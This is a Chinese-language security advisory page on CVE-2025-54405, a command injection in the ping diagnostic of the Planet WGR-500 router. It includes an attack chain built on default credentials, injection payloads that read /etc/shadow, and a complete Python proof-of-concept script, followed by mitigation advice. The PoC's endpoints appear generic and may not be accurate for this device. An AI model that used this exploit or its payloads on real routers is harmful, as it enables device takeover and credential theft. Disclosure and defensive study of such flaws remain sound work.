CVE-2025-54405 Planet WGR-500 formPingCmd命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-54405

漏洞类型

操作系统命令注入（OS Command Injection）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Planet WGR-500 路由器

漏洞概述

CVE-2025-54405是存在于Planet WGR-500路由器固件v1.3411b190912版本中的多个操作系统命令注入漏洞。该漏洞位于路由器的formPingCmd功能模块中，攻击者可以通过精心构造的一系列HTTP请求，利用请求参数中的`ipaddr`参数注入并执行任意操作系统命令。该漏洞由思科Talos安全团队发现并披露，CVSS 3.1评分为8.8分，属于高危级别漏洞。

Planet WGR-500是一款无线路由器产品，其Web管理界面提供了ping诊断功能（即formPingCmd），允许管理员通过Web界面执行ping命令以测试网络连通性。然而，该功能在实现过程中未对用户输入进行充分的安全过滤和验证，导致攻击者可以在`ipaddr`参数中注入shell命令分隔符（如分号、管道符、反引号等），从而执行任意系统命令。

由于该漏洞的攻击向量为网络（AV:N），且仅需要低权限认证（PR:L），无需用户交互（UI:N），一旦攻击者获得了路由器的有效登录凭据，即可远程利用该漏洞完全控制受影响的设备。成功利用后，攻击者可以执行任意命令，导致机密性、完整性和可用性的全面破坏（C:H/I:H/A:H）。该漏洞对使用Planet WGR-500路由器的家庭和企业网络环境构成了严重的安全威胁。

技术细节

该漏洞的核心问题在于Planet WGR-500路由器固件中formPingCmd功能的输入验证缺陷。具体技术细节如下：

1. **漏洞触发点**：路由器Web管理界面中的ping诊断功能（formPingCmd），该功能接收用户输入的IP地址作为ping命令的目标地址参数（`ipaddr`）。

2. **注入原理**：在正常情况下，`ipaddr`参数应仅接受合法的IPv4/IPv6地址格式。然而，由于后端CGI脚本在将用户输入传递给系统调用（如`system()`或`exec()`）执行ping命令时，未对特殊字符（如`;`、`|`、`&&`、`||`、反引号`` ` ``、`$()`等）进行过滤或转义，攻击者可以构造类似`127.0.0.1; cat /etc/passwd`的恶意输入。

3. **命令执行链**：当用户提交ping请求时，后端程序将`ipaddr`参数拼接到系统命令中执行，例如：`ping {ipaddr}`。注入的分号使得shell解析器将后续内容作为新的独立命令执行。

4. **利用条件**：攻击者需要拥有有效的低权限账户凭据（PR:L），这通常可以通过默认凭据、暴力破解或社工等方式获取。

5. **影响范围**：由于命令以路由器系统权限执行，攻击者可以完全控制设备，包括读取敏感配置文件、植入后门、修改网络配置、拦截网络流量等。

6. **漏洞变体**：根据描述，该漏洞存在多个变体，均与formPingCmd功能的命令注入相关，涉及不同的请求参数或注入点。

攻击链分析

STEP 1

步骤1：获取认证凭据

攻击者首先需要获取Planet WGR-500路由器的有效登录凭据。这可以通过默认凭据（如admin/admin）、暴力破解、字典攻击或社工等方式实现。由于漏洞仅需要低权限认证（PR:L），因此普通用户账户即可利用。

STEP 2

步骤2：登录路由器管理界面

攻击者使用获取的凭据通过HTTP POST请求登录路由器的Web管理界面（通常为/cgi-bin/login.cgi或类似端点），获取有效的会话Cookie。

STEP 3

步骤3：构造恶意HTTP请求

攻击者构造针对formPingCmd功能的HTTP请求，在`ipaddr`参数中注入恶意命令。例如：`ipaddr=127.0.0.1;cat /etc/shadow`或使用反引号`` ` ``、$()等shell特性执行命令。

STEP 4

步骤4：发送恶意请求触发漏洞

攻击者通过认证的会话发送包含恶意负载的HTTP请求到formPingCmd端点。后端CGI脚本将未经过滤的`ipaddr`参数拼接到系统命令中执行，导致任意命令执行。

STEP 5

步骤5：获取命令执行结果

注入的命令在路由器系统上以高权限执行，攻击者可以读取敏感文件（如/etc/passwd、配置文件）、植入持久化后门、修改网络设置或执行其他恶意操作。

STEP 6

步骤6：完全控制设备

利用成功后，攻击者获得对Planet WGR-500路由器的完全控制，可以拦截和篡改网络流量、窃取凭据、将设备纳入僵尸网络或作为内网渗透的跳板。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-54405 - Planet WGR-500 formPingCmd OS Command Injection PoC
# Vulnerability: OS Command Injection via ipaddr parameter in formPingCmd
# Affected: Planet WGR-500 v1.3411b190912

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

# Suppress SSL warnings
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

TARGET_URL = "http://192.168.1.1"  # Default router IP
USERNAME = "admin"  # Default credentials
PASSWORD = "admin"  # Default credentials

def exploit(target_url, username, password, cmd):
    """
    Exploit the command injection vulnerability in formPingCmd functionality.
    The ipaddr parameter is vulnerable to OS command injection.
    """
    session = requests.Session()
    
    # Step 1: Authenticate to the router
    login_url = f"{target_url}/login.cgi"
    login_data = {
        "username": username,
        "password": password
    }
    
    resp = session.post(login_url, data=login_data, verify=False)
    if resp.status_code != 200:
        print(f"[-] Login failed with status: {resp.status_code}")
        return None
    
    print(f"[+] Successfully authenticated to {target_url}")
    
    # Step 2: Inject malicious command via ipaddr parameter
    # The semicolon (;) terminates the ping command and starts a new one
    ping_url = f"{target_url}/apply.cgi"
    
    # Malicious payload: legitimate IP followed by command separator and injected command
    payload = f"127.0.0.1;{cmd}"
    
    ping_data = {
        "submit_button": "Ping",
        "change_action": "gozila_cgi",
        "ipaddr": payload  # Vulnerable parameter
    }
    
    resp = session.post(ping_url, data=ping_data, verify=False)
    
    if resp.status_code == 200:
        print(f"[+] Command injection executed: {cmd}")
        # Extract command output from response
        return resp.text
    else:
        print(f"[-] Exploit failed with status: {resp.status_code}")
        return None


if __name__ == "__main__":
    if len(sys.argv) > 1:
        command = " ".join(sys.argv[1:])
    else:
        command = "id"  # Default command to verify exploitation
    
    print(f"[*] Targeting CVE-2025-54405 - Planet WGR-500 Command Injection")
    print(f"[*] Command to execute: {command}")
    
    result = exploit(TARGET_URL, USERNAME, PASSWORD, command)
    
    if result:
        print(f"[+] Response:\n{result}")

影响范围

Planet WGR-500 v1.3411b190912

防御指南

临时缓解措施

在厂商发布正式修复补丁之前，建议采取以下临时缓解措施：1）立即修改路由器的默认管理员密码为强密码，并限制管理账户数量；2）禁用路由器的远程管理（WAN端管理）功能，仅允许从局域网（LAN）访问管理界面；3）通过防火墙规则限制可访问路由器管理界面的IP地址范围；4）部署网络监控规则，检测并阻止包含命令注入特征（如分号、管道符、反引号等）的HTTP请求；5）监控路由器的异常行为，如非预期的网络连接、CPU使用率异常升高等；6）如非必要，暂时禁用路由器的ping诊断功能（formPingCmd）；7）考虑将设备更换为已修复漏洞的型号或暂时使用其他网络设备。